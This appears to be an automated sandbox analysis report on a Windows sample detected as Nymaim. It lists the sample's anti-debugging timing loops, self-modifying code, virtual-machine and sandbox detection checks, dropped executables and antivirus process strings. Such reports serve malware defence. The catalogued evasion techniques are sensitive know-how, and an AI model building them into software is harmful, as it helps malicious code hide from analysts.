Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00F3F second address: 4A00F7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F6ED7580C42h 0x00000011 jmp 00007F6E64DC24C6h 0x00000016 mov edx, dword ptr [ebp+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F6E64DC24BAh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00F7D second address: 4A00F81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00F81 second address: 4A00F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00F87 second address: 4A00F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00F8D second address: 4A00FC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi] 0x0000000d pushad 0x0000000e popad 0x0000000f mov dword ptr [edx], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6E64DC24C2h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00FC5 second address: 4A00FDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F752Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00FDD second address: 4A00FE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00FE1 second address: 4A00FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00FE7 second address: 4A01004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E64DC24C9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01004 second address: 4A0103B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+04h], eax 0x0000000b pushad 0x0000000c call 00007F6E644F7533h 0x00000011 mov edi, ecx 0x00000013 pop ecx 0x00000014 mov edx, 61C184A8h 0x00000019 popad 0x0000001a mov eax, dword ptr [esi+08h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6E644F752Ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0103B second address: 4A0107B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F6E64DC24BDh 0x0000000b sbb eax, 3A53B8C6h 0x00000011 jmp 00007F6E64DC24C1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [edx+08h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6E64DC24BDh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0107B second address: 4A0110D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+0Ch] 0x0000000c jmp 00007F6E644F752Eh 0x00000011 mov dword ptr [edx+0Ch], eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F6E644F752Eh 0x0000001b and cx, 56F8h 0x00000020 jmp 00007F6E644F752Bh 0x00000025 popfd 0x00000026 call 00007F6E644F7538h 0x0000002b pushfd 0x0000002c jmp 00007F6E644F7532h 0x00000031 and eax, 42AF2088h 0x00000037 jmp 00007F6E644F752Bh 0x0000003c popfd 0x0000003d pop esi 0x0000003e popad 0x0000003f mov eax, dword ptr [esi+10h] 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0110D second address: 4A0111D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0111D second address: 4A011ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6E644F7531h 0x00000009 xor esi, 5C71F656h 0x0000000f jmp 00007F6E644F7531h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [edx+10h], eax 0x0000001d jmp 00007F6E644F752Ch 0x00000022 mov eax, dword ptr [esi+14h] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F6E644F752Eh 0x0000002c sbb cx, 57A8h 0x00000031 jmp 00007F6E644F752Bh 0x00000036 popfd 0x00000037 call 00007F6E644F7538h 0x0000003c pushfd 0x0000003d jmp 00007F6E644F7532h 0x00000042 add eax, 552AC538h 0x00000048 jmp 00007F6E644F752Bh 0x0000004d popfd 0x0000004e pop esi 0x0000004f popad 0x00000050 mov dword ptr [edx+14h], eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 pushfd 0x00000057 jmp 00007F6E644F7530h 0x0000005c adc ah, FFFFFF98h 0x0000005f jmp 00007F6E644F752Bh 0x00000064 popfd 0x00000065 mov eax, 4C00214Fh 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A011ED second address: 4A011FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+18h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A011FE second address: 4A01202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01202 second address: 4A01216 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0139A second address: 4A013B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [esi+2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A013B8 second address: 4A013BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A013BC second address: 4A013C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A013C0 second address: 4A013C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A013C6 second address: 4A01456 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7532h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+2Ch], ecx 0x0000000c jmp 00007F6E644F7530h 0x00000011 mov ax, word ptr [esi+30h] 0x00000015 pushad 0x00000016 mov esi, 267747FDh 0x0000001b pushfd 0x0000001c jmp 00007F6E644F752Ah 0x00000021 add ax, 20D8h 0x00000026 jmp 00007F6E644F752Bh 0x0000002b popfd 0x0000002c popad 0x0000002d mov word ptr [edx+30h], ax 0x00000031 jmp 00007F6E644F7536h 0x00000036 mov ax, word ptr [esi+32h] 0x0000003a jmp 00007F6E644F7530h 0x0000003f mov word ptr [edx+32h], ax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F6E644F752Ah 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01456 second address: 4A0145A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0145A second address: 4A01460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01460 second address: 4A0147F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, A6h 0x00000005 mov bx, B6DCh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esi+34h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6E64DC24BEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0147F second address: 4A01485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A01485 second address: 4A014DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+34h], eax 0x0000000b jmp 00007F6E64DC24C9h 0x00000010 test ecx, 00000700h 0x00000016 jmp 00007F6E64DC24BEh 0x0000001b jne 00007F6ED7580710h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F6E64DC24C7h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F013F second address: 49F0162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7535h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f movsx edx, cx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0162 second address: 49F01A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6E64DC24C9h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F6E64DC24BEh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F01A2 second address: 49F01A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F01A6 second address: 49F01AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F01AC second address: 49F01B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F01B2 second address: 49F01D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 mov cx, dx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F01D0 second address: 49F01D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0300 second address: 49F0306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0306 second address: 49F0383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F6E644F7530h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F6E644F7530h 0x00000016 mov ebp, esp 0x00000018 jmp 00007F6E644F7530h 0x0000001d mov eax, dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 call 00007F6E644F752Dh 0x00000028 pop esi 0x00000029 pushfd 0x0000002a jmp 00007F6E644F7531h 0x0000002f adc ecx, 1D3F1EC6h 0x00000035 jmp 00007F6E644F7531h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0383 second address: 49F03B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6E64DC24C8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F03B5 second address: 49F03C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F752Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49D0D7C second address: 49D0D84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 473B55 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 61E7DE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 642D83 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 6A1E48 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004739CC rdtsc 0_2_004739CC
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Bunifu_UI_v1.5.3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Y-Cleaner.exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 7392 Thread sleep time: -44022s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7316 Thread sleep count: 86 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7316 Thread sleep count: 85 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7316 Thread sleep count: 83 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7316 Thread sleep count: 86 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7316 Thread sleep count: 89 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7316 Thread sleep count: 84 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7316 Thread sleep count: 91 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7388 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7364 Thread sleep time: -44022s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00417727 FindFirstFileExW, 0_2_00417727
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10007EA9 FindFirstFileExW, 0_2_10007EA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A3798E FindFirstFileExW, 0_2_04A3798E
Source: file.exe, file.exe, 00000000.00000002.1946801836.00000000005FB000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000002.1947623162.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: file.exe, 00000000.00000002.1947623162.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.1946801836.00000000005FB000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.13.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FCBDA Start: 006FCC0E End: 006FCC12 0_2_006FCBDA
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004739CC rdtsc 0_2_004739CC
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040CDE3
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 0_2_00402A50
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h] 0_2_10007A76
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h] 0_2_10005F25
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04947D41 push dword ptr fs:[00000030h] 0_2_04947D41
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A20D90 mov eax, dword ptr fs:[00000030h] 0_2_04A20D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A2092B mov eax, dword ptr fs:[00000030h] 0_2_04A2092B
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402EE0 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,HeapFree,VirtualAlloc, 0_2_00402EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409A2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00409A2A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040CDE3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A58A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040A58A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A720 SetUnhandledExceptionFilter, 0_2_0040A720
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_10002ADF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_100056A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_10002FDA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A29C91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_04A29C91
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A2A7F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_04A2A7F1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A2D04A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_04A2D04A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A2A987 SetUnhandledExceptionFilter, 0_2_04A2A987
Source: file.exe, file.exe, 00000000.00000002.1946801836.00000000005FB000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: pQProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A2EC cpuid 0_2_0040A2EC
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00410822 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_00410822
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Nymaim
Source: Yara match File source: 0.2.file.exe.4a20e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.4a50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
